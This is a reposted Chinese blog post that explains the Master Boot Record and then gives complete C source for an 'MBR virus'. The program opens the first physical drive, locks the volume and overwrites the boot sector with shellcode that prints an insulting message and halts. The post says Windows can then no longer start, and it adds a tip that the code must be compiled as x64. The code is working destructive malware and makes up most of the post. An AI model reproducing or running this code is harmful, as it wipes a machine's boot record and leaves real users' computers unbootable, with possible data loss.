MBR病毒是如何运行的[转]

MBR的全称是"Master Boot Record"，它是硬盘的第一个扇区，通常包含了用于引导计算机操作系统的关键信息。MBR通常占用硬盘的前512字节，这个小小的区域扮演着非常重要的角色。

MBR包含以下关键信息和代码：

    引导代码（Boot Code）： 这是一小段机器代码，负责引导计算机启动过程。当计算机启动时，主板上的BIOS会加载MBR中的引导代码，并将控制权转交给它，从而启动操作系统的安装程序或引导加载程序。

    分区表（Partition Table）： MBR包含了一个分区表，通常有四个条目。每个条目描述了硬盘上一个分区的位置和大小。这些分区可以包含操作系统、数据或其他文件。分区表帮助计算机知道从哪个分区引导操作系统。

    硬盘签名（Disk Signature）： 这是一个唯一的标识符，用于标识硬盘。它通常是32位的数字。

计算机启动后会先运行MBR里的代码进行各种状态的检查和初始化的工作，然后再把控制权转交给操作系统(简单地讲就是一个JMP指令跳到操作系统的起始代码)，Windows就加载启动了。

MBR 病毒做的事就是直接把整个MBR覆盖掉，变成了它自己的代码，那么它想干什么都行了，只要它不主动交出代码执行流程，Windows绝没有启动的机会。

经过测试，在 64 位系统中必须使用 x64 编译才有效果，运行完代码后重启，屏幕上就会出现一行红字： "I am virus! " 。

    #include <windows.h>
    #include <winioctl.h>
     
    unsigned char scode[] =
    "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
    "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
    "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
    /*
    00000000  B81200 mov ax, 12H ; ah = 0, al = 12h (640 * 480)
    00000003  CD10 int 10h ; 进入图形显示方式，隐藏光标
    00000005  BD187C mov bp, Msg ; ES:BP = 串地址
    00000008  B91800 mov cx, 18h ; CX = 串长度
    0000000B  B80113 mov ax, 1301h ; AH = 13,  AL = 01h
    0000000E  BB0C00 mov bx, 000ch ; 页号为0(BH = 0) 黑底红字(BL = 0Ch,高亮)
    00000011  BA1D0E mov dx, 0e1dh ; dh行, dl列
    00000014  CD10 int 10h ; 10h 号中断
    00000016  E2FE loop $
    Msg: db "I am virus! Fuck you :-)"
    */
    int  main()
    {
        HANDLE hDevice;
        DWORD dwBytesWritten, dwBytesReturned;
        BYTE pMBR[512] = { 0 };
     
        // 重新构造MBR
        memcpy(pMBR, scode, sizeof(scode) - 1);
        pMBR[510] = 0x55;
        pMBR[511] = 0xAA;
     
        hDevice = CreateFile
        (
            L"\\\\.\\PHYSICALDRIVE0",
            GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            0,
            NULL
        );
        if (hDevice == INVALID_HANDLE_VALUE)
            return -1;
        DeviceIoControl
        (
            hDevice,
            FSCTL_LOCK_VOLUME,
            NULL,
            0,
            NULL,
            0,
            &dwBytesReturned,
            NULL
        );
        // 写入病毒内容
        WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
        DeviceIoControl
        (
            hDevice,
            FSCTL_UNLOCK_VOLUME,
            NULL,
            0,
            NULL,
            0,
            &dwBytesReturned,
            NULL
        );
        CloseHandle(hDevice);
        return 0;
    }

代码来源：https://www.cnblogs.com/xiongwei/p/9646017.html
————————————————

                            版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。
                        
原文链接：https://blog.csdn.net/lyshark_csdn/article/details/124939095